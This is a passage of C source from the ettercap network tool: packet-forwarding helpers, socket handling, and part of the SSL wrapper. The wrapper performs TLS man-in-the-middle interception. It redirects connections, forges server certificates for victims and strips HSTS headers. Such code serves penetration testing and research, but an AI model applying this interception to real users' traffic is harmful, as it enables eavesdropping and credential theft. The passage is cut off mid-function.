if(!(EC_GBL_IFACE->has_ipv4)) return; break; case LL_TYPE_IP6: if(!EC_GBL_LNET->lnet_IP6) return; if(!(EC_GBL_IFACE->has_ipv6)) return; break; } /* if unoffensive is set, don't forward any packet */ if (EC_GBL_OPTIONS->unoffensive || EC_GBL_OPTIONS->read) return; /* * forward the packet to Layer 3, the kernel * will route them to the correct destination (host or gw) */ /* don't forward dropped packets */ if ((po->flags & PO_DROPPED) == 0) send_to_L3(po); /* * if the packet was modified and it exceeded the mtu, * we have to inject the exceeded data */ if (po->DATA.inject) inject_buffer(po); } /* * check if the packet has been forwarded by us * the source mac address is our, but the ip address is different */ void unified_check_forwarded(struct packet_object *po) { /* the interface was not configured, the packets are not forwardable */ if (!EC_GBL_IFACE->is_ready) return; /* * dont sniff forwarded packets (equal mac, different ip) * but only if we are on live connections */ if (EC_GBL_CONF->skip_forwarded && !EC_GBL_OPTIONS->read && !memcmp(EC_GBL_IFACE->mac, po->L2.src, MEDIA_ADDR_LEN) && ip_addr_is_ours(&po->L3.src) != E_FOUND) { po->flags |= PO_FORWARDED; } } /* * if the dest mac address of the packet is * the same of EC_GBL_IFACE->mac but the dest ip is * not the same as EC_GBL_IFACE->ip, the packet is not * for us and we can do mitm on it before forwarding. */ void unified_set_forwardable(struct packet_object *po) { /* * if the mac is our, but the ip is not... * it has to be forwarded */ if (!memcmp(EC_GBL_IFACE->mac, po->L2.dst, MEDIA_ADDR_LEN) && memcmp(EC_GBL_IFACE->mac, po->L2.src, MEDIA_ADDR_LEN) && ip_addr_is_ours(&po->L3.dst) != E_FOUND) { po->flags |= PO_FORWARDABLE; } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_socket.c000664 000000 000000 00000011521 13711276346 016354 0ustar00rootroot000000 000000 /* ettercap -- socket handling module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #ifndef OS_WINDOWS #include #include #include #include #endif #include /*******************************************/ /* * set or unset blocking flag on a socket */ void set_blocking(int s, int set) { #ifdef OS_WINDOWS u_long on = set; ioctlsocket(s, FIONBIO, &on); #else int ret; /* get the current flags */ if ((ret = fcntl(s, F_GETFL, 0)) == -1) return; if (set) ret &= ~O_NONBLOCK; else ret |= O_NONBLOCK; /* set the flag */ // fcntl (s, F_SETFL, F_SETFD, FD_CLOEXEC, ret); //this solution BREAKS the socket (ssl mitm will not work) fcntl(s, F_SETFL, ret); #endif } /* * open a socket to the specified host and port */ int open_socket(const char *host, u_int16 port) { struct addrinfo *result, *res; struct addrinfo hints; int sh, ret, err = 0; #define TSLEEP (50*1000) /* 50 milliseconds */ int loops = (EC_GBL_CONF->connect_timeout * 10e5) / TSLEEP; char service[5+1]; DEBUG_MSG("open_socket -- [%s]:[%d]", host, port); /* convert port number to string */ snprintf(service, 6, "%u", port); /* predefine TCP as socket type and protocol */ memset(&hints, 0, sizeof(struct addrinfo)); hints.ai_socktype = SOCK_STREAM; /* resolve hostname */ if ((ret = getaddrinfo(host, service, &hints, &result)) != 0) { DEBUG_MSG("unable to resolve %s using getaddrinfo(): %s", host, gai_strerror(ret)); return -E_NOADDRESS; } /* go though results and try to connect */ for (res = result; res != NULL; res = res->ai_next) { /* open the socket */ if ( (sh = socket(res->ai_family, res->ai_socktype, res->ai_protocol)) < 0) { freeaddrinfo(result); return -E_FATAL; } /* set nonblocking socket */ set_blocking(sh, 0); do { /* connect to the server */ ret = connect(sh, res->ai_addr, res->ai_addrlen); /* connect is in progress... */ if (ret < 0) { err = GET_SOCK_ERRNO(); if (err == EINPROGRESS || err == EALREADY || err == EWOULDBLOCK || err == EAGAIN) { /* sleep a quirk of time... */ DEBUG_MSG("open_socket: connect() retrying: %d", err); ec_usleep(TSLEEP); /* 50000 microseconds */ } } else { /* there was an error or the connect was successful */ break; } } while(loops--); /* if connected we skip other addresses */ if (ret == 0) break; } /* * we cannot recall get_sock_errno because under windows * calling it twice would not return the same result */ err = ret < 0 ? err : 0; /* reached the timeout */ if (ret < 0 && (err == EINPROGRESS || err == EALREADY || err == EAGAIN)) { DEBUG_MSG("open_socket: connect() timeout: %d", err); close_socket(sh); freeaddrinfo(result); return -E_TIMEOUT; } /* error while connecting */ if (ret < 0 && err != EISCONN) { DEBUG_MSG("open_socket: connect() error: %d", err); close_socket(sh); freeaddrinfo(result); return -E_INVALID; } DEBUG_MSG("open_socket: connect() connected."); /* reset the state to blocking socket */ set_blocking(sh, 1); DEBUG_MSG("open_socket: %d", sh); freeaddrinfo(result); return sh; } /* * close the given socket */ int close_socket(int s) { DEBUG_MSG("close_socket: %d", s); /* close the socket */ #ifdef OS_WINDOWS return closesocket(s); #else return close(s); #endif } /* * send a buffer throught the socket */ int socket_send(int s, const u_char *payload, size_t size) { /* send data to the socket */ return send(s, payload, size, 0); } /* * receive data from the socket */ int socket_recv(int sh, u_char *payload, size_t size) { /* read up to size byte */ return recv(sh, payload, size, 0); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_sslwrap.c000664 000000 000000 00000113254 13711276346 016565 0ustar00rootroot000000 000000 /* ettercap -- SSL support Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef OS_LINUX #include #endif #if defined OS_LINUX && defined WITH_IPV6 #include #endif #include #include // XXX - check if we have poll.h #ifdef HAVE_SYS_POLL_H #include #endif /* don't include kerberos. RH sux !! */ #define OPENSSL_NO_KRB5 1 #include #ifdef DEBUG #include #endif #if (OPENSSL_VERSION_NUMBER >= 0x10100000L) #define HAVE_OPAQUE_RSA_DSA_DH 1 /* since 1.1.0 -pre5 */ #endif #if (OPENSSL_VERSION_NUMBER >= 0x10002000L) #define HAVE_OPENSSL_1_0_2 #endif #if (OPENSSL_VERSION_NUMBER <= 0x100020700L) /* prior 1.0.2g TLS_client_method macro wasn't available */ #define TLS_client_method SSLv23_client_method #define TLS_server_method SSLv23_server_method #endif #if (OPENSSL_VERSION_NUMBER >= 0x10100000L) #define HAVE_OPENSSL_1_1_0 #endif #if (OPENSSL_VERSION_NUMBER >= 0x10101000L) #define HAVE_OPENSSL_1_1_1 #endif #define BREAK_ON_ERROR(x,y,z) do { \ if (x == -E_INVALID) { \ SAFE_FREE(z.DATA.disp_data); \ sslw_initialize_po(&z, z.DATA.data); \ z.len = 64; \ z.L4.flags = TH_RST; \ packet_disp_data(&z, z.DATA.data, z.DATA.len); \ sslw_parse_packet(y, SSL_SERVER, &z); \ sslw_wipe_connection(y); \ SAFE_FREE(z.DATA.data); \ SAFE_FREE(z.DATA.disp_data); \ ec_thread_exit(); \ } \ } while(0) /* globals */ static LIST_HEAD (, listen_entry) listen_ports; struct listen_entry { int fd; int fd6; u_int16 sslw_port; /* Port where we want to wrap SSL */ u_int16 redir_port; /* Port where accepts connections */ u_char status; /* Use directly SSL or not */ char *name; LIST_ENTRY (listen_entry) next; }; struct accepted_entry { int32 fd[2]; /* 0->Client, 1->Server */ u_int16 port[2]; struct ip_addr ip[2]; SSL *ssl[2]; u_char status; X509 *cert; #ifdef HAVE_OPENSSL_1_1_1 unsigned int tls_handshake_state; #define SSL_CLIENTHELLO_INTERCEPTED 1 char *hostname; #endif #define SSL_CLIENT 0 #define SSL_SERVER 1 }; /* Session identifier * It has to be of even length for session hash matching */ struct sslw_ident { u_int32 magic; #define SSLW_MAGIC 0x0501e77e struct ip_addr L3_src; u_int16 L4_src; u_int16 L4_dst; }; #define SSLW_IDENT_LEN sizeof(struct sslw_ident) #define SSLW_RETRY 500 #define SSLW_WAIT 10 /* 10 milliseconds */ #define TSLEEP (50*1000) /* 50 milliseconds */ #ifdef HAVE_OPENSSL_1_1_0 static SSL_CONF_CTX *ssl_conf_client, *ssl_conf_server; #endif static SSL_CTX *ssl_ctx_client, *ssl_ctx_server; static EVP_PKEY *global_pk; static u_int16 number_of_services; static struct pollfd *poll_fd = NULL; static EC_THREAD_FUNC(sslw_child); static int sslw_is_ssl(struct packet_object *po); static int sslw_connect_server(struct accepted_entry *ae); static int sslw_sync_conn(struct accepted_entry *ae); static int sslw_get_peer(struct accepted_entry *ae); static void sslw_bind_wrapper(void); static int sslw_read_data(struct accepted_entry *ae, u_int32 direction, struct packet_object *po); static int sslw_write_data(struct accepted_entry *ae, u_int32 direction, struct packet_object *po); static void sslw_wipe_connection(struct accepted_entry *ae); static void sslw_init(void); static void sslw_initialize_po(struct packet_object *po, u_char *p_data); static int sslw_match(void *id_sess, void *id_curr); static void sslw_create_session(struct ec_session **s, struct packet_object *po); static size_t sslw_create_ident(void **i, struct packet_object *po); static void sslw_hook_handled(struct packet_object *po); static X509 *sslw_create_selfsigned(X509 *serv_cert); static void ssl_wrap_fini(void); static int sslw_ssl_connect(SSL *ssl_sk); static int sslw_ssl_accept(SSL *ssl_sk); static int sslw_remove_sts(struct packet_object *po); #ifdef HAVE_OPENSSL_1_1_1 static int sslw_clienthello_cb(SSL *ssl_sk, int *alert, void *arg); static char* sslw_get_clienthello_sni(SSL *ssl); #endif /*******************************************/ /* * Register a new ssl wrapper */ void sslw_dissect_add(char *name, u_int32 port, FUNC_DECODER_PTR(decoder), u_char status) { struct listen_entry *le; SAFE_CALLOC(le, 1, sizeof(struct listen_entry)); le->sslw_port = port; le->status = status; le->name = name; /* Insert it in the port list where listen for connections */ LIST_INSERT_HEAD(&listen_ports, le, next); dissect_add(name, APP_LAYER_TCP, port, decoder); } /* * Move a ssl_wrapper on another port */ void sslw_dissect_move(char *name, u_int16 port) { struct listen_entry *le, *tmp; LIST_FOREACH_SAFE(le, &listen_ports, next, tmp) if(!strcmp(name, le->name)) { DEBUG_MSG("sslw_dissect_move: %s [%u]", name, port); le->sslw_port = port; /* Move to zero means disable */ if (port == 0) { LIST_REMOVE(le, next); SAFE_FREE(le); } } } /* * Initialize the ssl wrappers */ void ssl_wrap_init(void) { struct listen_entry *le; /* disable if the aggressive flag is not set */ if (!EC_GBL_CONF->aggressive_dissectors) { DEBUG_MSG("ssl_wrap_init: not aggressive"); return; } /* a valid script for the redirection must be set */ if (!EC_GBL_CONF->redir_command_on) { DEBUG_MSG("ssl_wrap_init: no redirect script"); USER_MSG("SSL dissection needs a valid 'redir_command_on' script in the etter.conf file\n"); return; } DEBUG_MSG("ssl_wrap_init"); sslw_init(); sslw_bind_wrapper(); /* Add the hook to block real ssl packet going to top half */ hook_add(HOOK_HANDLED, &sslw_hook_handled); number_of_services = 0; LIST_FOREACH(le, &listen_ports, next) number_of_services++; #ifdef WITH_IPV6 /* with IPv6 enabled we actually duplicate the number of listener sockets */ number_of_services *= 2; #endif SAFE_CALLOC(poll_fd, 1, sizeof(struct pollfd) * number_of_services); atexit(ssl_wrap_fini); } static void ssl_wrap_fini(void) { struct listen_entry *le, *old; DEBUG_MSG("ATEXIT: ssl_wrap_fini"); /* remove every redirect rule and close listener sockets */ LIST_FOREACH_SAFE(le, &listen_ports, next, old) { close(le->fd); #ifdef WITH_IPV6 close(le->fd6); #endif LIST_REMOVE(le, next); SAFE_FREE(le); } SSL_CTX_free(ssl_ctx_server); SSL_CTX_free(ssl_ctx_client); #ifdef HAVE_OPENSSL_1_1_0 SSL_CONF_CTX_free(ssl_conf_client); SSL_CONF_CTX_free(ssl_conf_server); #endif /* remove redirects */ ec_redirect_cleanup(); } /* * SSL thread main function. */ EC_THREAD_FUNC(sslw_start) { struct listen_entry *le; struct accepted_entry *ae; struct sockaddr_storage client_ss; struct sockaddr *sa; struct sockaddr_in *sa4; #ifdef WITH_IPV6 struct sockaddr_in6 *sa6; #endif u_int len = sizeof(client_ss); int fd = 0, nfds = 0, i = 0; /* variable not used */ (void) EC_THREAD_PARAM; ec_thread_init(); /* disabled if not aggressive */ if (!EC_GBL_CONF->aggressive_dissectors) return NULL; /* a valid script for the redirection must be set */ if (!EC_GBL_CONF->redir_command_on) return NULL; DEBUG_MSG("sslw_start: initialized and ready"); /* set the polling on all registered services */ LIST_FOREACH(le, &listen_ports, next) { poll_fd[nfds].fd = le->fd; poll_fd[nfds].events = POLLIN; #ifdef WITH_IPV6 nfds++; poll_fd[nfds].fd = le->fd6; poll_fd[nfds].events = POLLIN; #endif nfds++; } LOOP { poll(poll_fd, nfds, -1); /* Find out which file descriptor got active */ for (i=0; ifd) { fd = le->fd; break; } #ifdef WITH_IPV6 if (poll_fd[i].fd == le->fd6) { fd = le->fd6; break; } #endif } DEBUG_MSG("ssl_wrapper -- got a connection on port %d [%d]", le->redir_port, le->sslw_port); SAFE_CALLOC(ae, 1, sizeof(struct accepted_entry)); ae->fd[SSL_CLIENT] = accept(fd, (struct sockaddr *)&client_ss, &len); /* Error checking */ if (ae->fd[SSL_CLIENT] == -1) { SAFE_FREE(ae); continue; } /* Set the server original port for protocol dissection */ ae->port[SSL_SERVER] = htons(le->sslw_port); /* Check if we have to enter SSL status */ ae->status = le->status; /* Set the peer (client) in the connection list entry */ sa = (struct sockaddr *)&client_ss; switch (sa->sa_family) { case AF_INET: sa4 = (struct sockaddr_in *)&client_ss; ae->port[SSL_CLIENT] = sa4->sin_port; ip_addr_init(&(ae->ip[SSL_CLIENT]), AF_INET, (u_char *)&(sa4->sin_addr.s_addr)); break; #ifdef WITH_IPV6 case AF_INET6: sa6 = (struct sockaddr_in6 *)&client_ss; ae->port[SSL_CLIENT] = sa6->sin6_port; ip_addr_init(&(ae->ip[SSL_CLIENT]), AF_INET6, (u_char *)&(sa6->sin6_addr.s6_addr)); break; #endif } /* create a detached thread */ ec_thread_new_detached("sslw_child", "ssl child", &sslw_child, ae, 1); } } return NULL; } /* * Filter SSL related packets and create NAT sessions. * It hooks HOOK_HANDLED. */ static void sslw_hook_handled(struct packet_object *po) { struct ec_session *s = NULL; /* We have nothing to do with this packet */ if (!sslw_is_ssl(po)) return; /* If it's an ssl packet don't forward */ po->flags |= PO_DROPPED; /* If it's a new connection */ if ( (po->flags & PO_FORWARDABLE) && (po->L4.flags & TH_SYN) && !(po->L4.flags & TH_ACK) ) { sslw_create_session(&s, PACKET); #ifndef OS_LINUX /* Remember the real destination IP */ memcpy(s->data, &po->L3.dst, sizeof(struct ip_addr)); session_put(s); #else SAFE_FREE(s); /* Just get rid of it */ #endif } else /* Pass only the SYN for conntrack */ po->flags |= PO_IGNORE; } /* * Check if this packet is for ssl wrappers */ static int sslw_is_ssl(struct packet_object *po) { /* If it's already coming from ssl wrapper * or the connection is not TCP */ if (po->flags & PO_FROMSSL || po->L4.proto != NL_TYPE_TCP) return 0; /* check if packet matches one of the registered redirects */ if (ec_redirect_lookup(po) == E_SUCCESS) return 1; return 0; } /* * Bind all registered wrappers to free ports * and isnert redirects. */ static void sslw_bind_wrapper(void) { u_int16 bind_port = EC_MAGIC_16; struct listen_entry *le; struct sockaddr_in sa_in; #ifdef WITH_IPV6 struct sockaddr_in6 sa_in6; int optval = 1; #endif LIST_FOREACH(le, &listen_ports, next) { le->fd = socket(AF_INET, SOCK_STREAM, 0); if (le->fd == -1) FATAL_ERROR("Unable to create socket in sslw_bind_wrapper()"); memset(&sa_in, 0, sizeof(sa_in)); sa_in.sin_family = AF_INET; sa_in.sin_addr.s_addr = INADDR_ANY; do { bind_port++; sa_in.sin_port = htons(bind_port); le->redir_port = bind_port; } while ( bind(le->fd, (struct sockaddr *)&sa_in, sizeof(sa_in)) != 0); DEBUG_MSG("sslw - bind %d on %d", le->sslw_port, le->redir_port); if(listen(le->fd, 100) == -1) FATAL_ERROR("Unable to accept connections for socket"); #ifdef WITH_IPV6 /* create & bind IPv6 socket on the same port */ le->fd6 = socket(AF_INET6, SOCK_STREAM, 0); if (le->fd6 == -1) FATAL_ERROR("Unable to create socket in sslw_bind_wrapper() for IPv6"); memset(&sa_in6, 0, sizeof(sa_in6)); sa_in6.sin6_family = AF_INET6; sa_in6.sin6_addr = in6addr_any; sa_in6.sin6_port = htons(bind_port); /* we only listen on v6 as we use dedicated sockets per AF */ if (setsockopt(le->fd6, IPPROTO_IPV6, IPV6_V6ONLY, &optval, sizeof(optval)) == -1) FATAL_ERROR("Unable to set IPv6 socket to IPv6 only in sslw_bind_wrapper(): %s", strerror(errno)); /* bind to IPv6 on the same port as the IPv4 socket */ if (bind(le->fd6, (struct sockaddr *)&sa_in6, sizeof(sa_in6)) == -1) FATAL_ERROR("Unable to bind() IPv6 socket to port %d in sslw_bind_wrapper(): %s", bind_port, strerror(errno)); if(listen(le->fd6, 100) == -1) FATAL_ERROR("Unable to accept connections for IPv6 socket"); #else /* properly init fd even if unused - necessary for select call */ le->fd6 = 0; #endif if (ec_redirect(EC_REDIR_ACTION_INSERT, le->name, EC_REDIR_PROTO_IPV4, NULL, le->sslw_port, le->redir_port) != E_SUCCESS) FATAL_ERROR("Can't insert firewall redirects"); #ifdef WITH_IPV6 if (ec_redirect(EC_REDIR_ACTION_INSERT, le->name, EC_REDIR_PROTO_IPV6, NULL, le->sslw_port, le->redir_port) != E_SUCCESS) FATAL_ERROR("Can't insert firewall redirects"); #endif } } /* * Create TCP a connection to the real SSL server */ static int sslw_sync_conn(struct accepted_entry *ae) { if(sslw_get_peer(ae) != E_SUCCESS) return -E_INVALID; if(sslw_connect_server(ae) != E_SUCCESS) return -E_INVALID; /* set nonbloking socket */ set_blocking(ae->fd[SSL_CLIENT], 0); set_blocking(ae->fd[SSL_SERVER], 0); return E_SUCCESS; } /* * Perform a blocking SSL_connect with a * configurable timeout on a non-blocing socket */ static int sslw_ssl_connect(SSL *ssl_sk) { int loops = (EC_GBL_CONF->connect_timeout * 10e5) / TSLEEP; int ret, ssl_err; do { /* connect to the server */ if ( (ret = SSL_connect(ssl_sk)) == 1) return E_SUCCESS; ssl_err = SSL_get_error(ssl_sk, ret); /* there was an error... */ if (ssl_err != SSL_ERROR_WANT_READ && ssl_err != SSL_ERROR_WANT_WRITE) return -E_INVALID; /* sleep a quirk of time... */ ec_usleep(TSLEEP); } while(loops--); return -E_INVALID; } /* * ClientHello Callback to intercept SSL handshake after ClientHello */ #ifdef HAVE_OPENSSL_1_1_1 static int sslw_clienthello_cb(SSL *ssl, int *alert, void *arg) { (void) alert; struct accepted_entry *ae; ae = (struct accepted_entry *)arg; /* extract hostname value from SNI extension */ ae->hostname = sslw_get_clienthello_sni(ssl); if (ae->tls_handshake_state != SSL_CLIENTHELLO_INTERCEPTED) { ae->tls_handshake_state = SSL_CLIENTHELLO_INTERCEPTED; /* suspend client side TLS handshake */ return SSL_CLIENT_HELLO_RETRY; } return SSL_CLIENT_HELLO_SUCCESS; } static char* sslw_get_clienthello_sni(SSL *ssl) { const unsigned char* sni; size_t len; uint8_t sni_type; uint16_t val_len; // uint16_t sni_len; if (SSL_client_hello_get0_ext(ssl, TLSEXT_TYPE_server_name, &sni, &len)) { if (len > 5) { // sni_len = sni[0] << 8 | sni[1]; sni_type = sni[2]; val_len = sni[3] << 8 | sni[4]; if (sni_type == TLSEXT_NAMETYPE_host_name) return strndup(sni+5, val_len); } } return NULL; } #endif /* * Perform a blocking SSL_accept with a * configurable timeout on a non-blocing socket */ static int sslw_ssl_accept(SSL *ssl_sk) { int loops = (EC_GBL_CONF->connect_timeout * 10e5) / TSLEEP; int ret, ssl_err; do { /* accept the ssl connection */ if ( (ret = SSL_accept(ssl_sk)) == 1) return E_SUCCESS; ssl_err = SSL_get_error(ssl_sk, ret); #ifdef HAVE_OPENSSL_1_1_1 /* return successfully if handshake has been suspended by callback */ if (ssl_err == SSL_ERROR_WANT_CLIENT_HELLO_CB) return E_SUCCESS; #endif /* there was an error... but only if it's not just pending further progress */ if (ssl_err != SSL_ERROR_WANT_READ && ssl_err != SSL_ERROR_WANT_WRITE) { #ifdef DEBUG char error_msg[256], *error; error = ERR_error_string(ERR_get_error(), error_msg); DEBUG_MSG("sslw_ssl_accept(): SSL_accept() failed with '%s'", error); #endif return -E_INVALID; } /* sleep a quirk of time... */ ec_usleep(TSLEEP); } while(loops--); return -E_INVALID; } /* * Create an SSL connection to the real server. * Grab server certificate and create a fake one * for the poor client. * Then accept the SSL connection from the client. */ static int sslw_sync_ssl(struct accepted_entry *ae) { X509 *server_cert; #ifdef HAVE_OPENSSL_1_1_1 /* Set a Callback for the SSL client context to pause the Client Handshake */ SSL_CTX_set_client_hello_cb(ssl_ctx_client, sslw_clienthello_cb, (void*)ae); #endif ae->ssl[SSL_SERVER] = SSL_new(ssl_ctx_server); SSL_set_connect_state(ae->ssl[SSL_SERVER]); SSL_set_fd(ae->ssl[SSL_SERVER], ae->fd[SSL_SERVER]); ae->ssl[SSL_CLIENT] = SSL_new(ssl_ctx_client); SSL_set_fd(ae->ssl[SSL_CLIENT], ae->fd[SSL_CLIENT]); #ifdef HAVE_OPENSSL_1_1_1 /* Begin SSL handshake to extract SNI - then suspend by callback */ if (sslw_ssl_accept(ae->ssl[SSL_CLIENT]) != E_SUCCESS) return -E_INVALID; if (ae->hostname) /* set SNI for server-side connection */ SSL_set_tlsext_host_name(ae->ssl[SSL_SERVER], ae->hostname); #endif /* Connect to actual SSL server */ if (sslw_ssl_connect(ae->ssl[SSL_SERVER]) != E_SUCCESS) return -E_INVALID; /* Extract certificate from actual SSL server */ /* XXX - NULL cypher can give no certificate */ if ( (server_cert = SSL_get_peer_certificate(ae->ssl[SSL_SERVER])) == NULL) { DEBUG_MSG("Can't get peer certificate"); return -E_INVALID; } if (!EC_GBL_OPTIONS->ssl_cert) { /* Create the fake certificate based on actual certificate */ ae->cert = sslw_create_selfsigned(server_cert); X509_free(server_cert); if (ae->cert == NULL) return -E_INVALID; /* use faked certificate for further SSL client connection */ SSL_use_certificate(ae->ssl[SSL_CLIENT], ae->cert); } /* continue SSL handshake with SSL client */ if (sslw_ssl_accept(ae->ssl[SSL_CLIENT]) != E_SUCCESS) return -E_INVALID; #ifdef HAVE_OPENSSL_1_1_1 /* TLS handshake done - SNI hostname not longer required: free */ SAFE_FREE(ae->hostname); #endif return E_SUCCESS; } /* * Take the IP address of the server * that the client wants to talk to. */ static int sslw_get_peer(struct accepted_entry *ae) { /* If on Linux, we can just get the SO_ORIGINAL_DST from getsockopt() no need for this loop nonsense. */ #ifndef OS_LINUX struct ec_session *s = NULL; struct packet_object po; void *ident = NULL; int i; /* Take the server IP address from the NAT sessions */ memcpy(&po.L3.src, &ae->ip[SSL_CLIENT], sizeof(struct ip_addr)); po.L4.src = ae->port[SSL_CLIENT]; po.L4.dst = ae->port[SSL_SERVER]; sslw_create_ident(&ident, &po); /* * A little waiting loop because the sniffing thread , * which creates the session, may be slower than this */ for (i=0; iip[SSL_SERVER], s->data, sizeof(struct ip_addr)); SAFE_FREE(s->data); SAFE_FREE(s); SAFE_FREE(ident); #else struct sockaddr_storage ss; struct sockaddr_in *sa4; #if defined WITH_IPV6 && defined HAVE_IP6T_SO_ORIGINAL_DST struct sockaddr_in6 *sa6; #endif socklen_t ss_len = sizeof(struct sockaddr_storage); switch (ntohs(ae->ip[SSL_CLIENT].addr_type)) { case AF_INET: if (getsockopt(ae->fd[SSL_CLIENT], SOL_IP, SO_ORIGINAL_DST, (struct sockaddr*)&ss, &ss_len) == -1) { WARN_MSG("getsockopt failed: %s", strerror(errno)); return -E_INVALID; } sa4 = (struct sockaddr_in *)&ss; ip_addr_init(&(ae->ip[SSL_SERVER]), AF_INET, (u_char *)&(sa4->sin_addr.s_addr)); break; #if defined WITH_IPV6 && defined HAVE_IP6T_SO_ORIGINAL_DST case AF_INET6: if (getsockopt(ae->fd[SSL_CLIENT], IPPROTO_IPV6, IP6T_SO_ORIGINAL_DST, (struct sockaddr*)&ss, &ss_len) == -1) { WARN_MSG("getsockopt failed: %s", strerror(errno)); return -E_INVALID; } sa6 = (struct sockaddr_in6 *)&ss; ip_addr_init(&(ae->ip[SSL_SERVER]), AF_INET6, (u_char *)&(sa6->sin6_addr.s6_addr)); break; #endif } #endif return E_SUCCESS; } /* * Take the other peer (server) from ssl-decoders' sessions * and contact it. * Check if we have to enter SSL state. */ static int sslw_connect_server(struct accepted_entry *ae) { char dest_ip[MAX_ASCII_ADDR_LEN]; ip_addr_ntoa(&ae->ip[SSL_SERVER], dest_ip); /* Standard connection to the server */ if ((ae->fd[SSL_SERVER] = open_socket(dest_ip, ntohs(ae->port[SSL_SERVER]))) < 0) { DEBUG_MSG("Could not open socket"); return -E_INVALID; } return E_SUCCESS; } /* * Read the data from an accepted connection. * Check if it already entered SSL state. */ static int sslw_read_data(struct accepted_entry *ae, u_int32 direction, struct packet_object *po) { int len, ret_err; if (ae->status & SSL_ENABLED) len = SSL_read(ae->ssl[direction], po->DATA.data, 1024); else //len = socket_recv(ae->fd[direction], po->DATA.data, 1024); len = read(ae->fd[direction], po->DATA.data, 1024); /* XXX - Check when it returns 0 (it was a <)*/ if (len <= 0 && (ae->status & SSL_ENABLED)) { ret_err = SSL_get_error(ae->ssl[direction], len); /* XXX - Is it necessary? */ if (len == 0) return -E_INVALID; if (ret_err == SSL_ERROR_WANT_READ || ret_err == SSL_ERROR_WANT_WRITE) return -E_NOTHANDLED; else return -E_INVALID; } /* Only if no ssl */ if (len < 0) { int err = GET_SOCK_ERRNO(); if (err == EINTR || err == EAGAIN) return -E_NOTHANDLED; else return -E_INVALID; } /* XXX - On standard reads, close is 0? (EOF)*/ if (len == 0) return -E_INVALID; po->len = len; po->DATA.len = len; po->L4.flags |= TH_PSH; /* NULL terminate the data buffer */ po->DATA.data[po->DATA.len] = 0; /* remove STS header */ if (direction == SSL_SERVER) sslw_remove_sts(po); /* create the buffer to be displayed */ packet_destroy_object(po); packet_disp_data(po, po->DATA.data, po->DATA.len); return E_SUCCESS; } /* * Write the data into an accepted connection. * Check if it already entered SSL state. */ static int sslw_write_data(struct accepted_entry *ae, u_int32 direction, struct packet_object *po) { int32 len, packet_len, not_written, ret_err; u_char *p_data; packet_len = (int32)(po->DATA.len + po->DATA.inject_len); p_data = po->DATA.data; if (packet_len == 0) return E_SUCCESS; do { not_written = 0; /* Write packet data */ if (ae->status & SSL_ENABLED) len = SSL_write(ae->ssl[direction], p_data, packet_len); else //len = socket_send(ae->fd[direction], p_data, packet_len); len = write(ae->fd[direction], p_data, packet_len); if (len <= 0 && (ae->status & SSL_ENABLED)) { ret_err = SSL_get_error(ae->ssl[direction], len); if (ret_err == SSL_ERROR_WANT_READ || ret_err == SSL_ERROR_WANT_WRITE) not_written = 1; else return -E_INVALID; } if (len < 0 && !(ae->status & SSL_ENABLED)) { int err = GET_SOCK_ERRNO(); if (err == EINTR || err == EAGAIN) not_written = 1; else return -E_INVALID; } /* XXX - does some OS use partial writes for SSL? */ if (len < packet_len && !not_written ) { DEBUG_MSG("SSL-Wrapper partial writes: to be implemented..."); packet_len -= len; p_data += len; not_written = 1; } /* XXX - Set a proper sleep time */ if (not_written) ec_usleep(SEC2MICRO(1)); } while (not_written); return E_SUCCESS; } /* * Fill the packet object and put it in * the dissector stack (above protocols decoders) */ static void sslw_parse_packet(struct accepted_entry *ae, u_int32 direction, struct packet_object *po) { FUNC_DECODER_PTR(start_decoder); int len; /* * ssl childs keep the connection alive even if the sniffing thread * was stopped. But don't add packets to top-half queue. */ if (!EC_GBL_SNIFF->active) return; memcpy(&po->L3.src, &ae->ip[direction], sizeof(struct ip_addr)); memcpy(&po->L3.dst, &ae->ip[!direction], sizeof(struct ip_addr)); po->L4.src = ae->port[direction]; po->L4.dst = ae->port[!direction]; po->flags |= PO_FROMSSL; /* get current time */ gettimeofday(&po->ts, NULL); /* calculate if the dest is local or not */ switch (ip_addr_is_local(&PACKET->L3.src, NULL)) { case E_SUCCESS: PACKET->PASSIVE.flags &= ~(FP_HOST_NONLOCAL); PACKET->PASSIVE.flags |= FP_HOST_LOCAL; break; case -E_NOTFOUND: PACKET->PASSIVE.flags &= ~FP_HOST_LOCAL; PACKET->PASSIVE.flags |= FP_HOST_NONLOCAL; break; case -E_INVALID: PACKET->PASSIVE.flags = FP_UNKNOWN; break; } /* Let's start from the last stage of decoder chain */ start_decoder = get_decoder(APP_LAYER, PL_DEFAULT); start_decoder(po->DATA.data, po->DATA.len, &len, po); } /* * Remove the connection from the accepted * list and close both sockets. */ static void sslw_wipe_connection(struct accepted_entry *ae) { if (ae->ssl[SSL_CLIENT]) SSL_free(ae->ssl[SSL_CLIENT]); if (ae->ssl[SSL_SERVER]) SSL_free(ae->ssl[SSL_SERVER]); close_socket(ae->fd[SSL_CLIENT]); close_socket(ae->fd[SSL_SERVER]); if (ae->cert) X509_free(ae->cert); if(ae) SAFE_FREE(ae); } /* * Initialize a fake PO to be passed to top half */ static void sslw_initialize_po(struct packet_object *po, u_char *p_data) { /* * Allocate the data buffer and initialize * fake headers. Headers len is set to 0. * XXX - Be sure to not modify these len. */ memset(po, 0, sizeof(struct packet_object)); if (p_data == NULL) { SAFE_CALLOC(po->DATA.data, 1, UINT16_MAX); } else { if (po->DATA.data != p_data) { SAFE_FREE(po->DATA.data); po->DATA.data = p_data; } } po->L2.header = 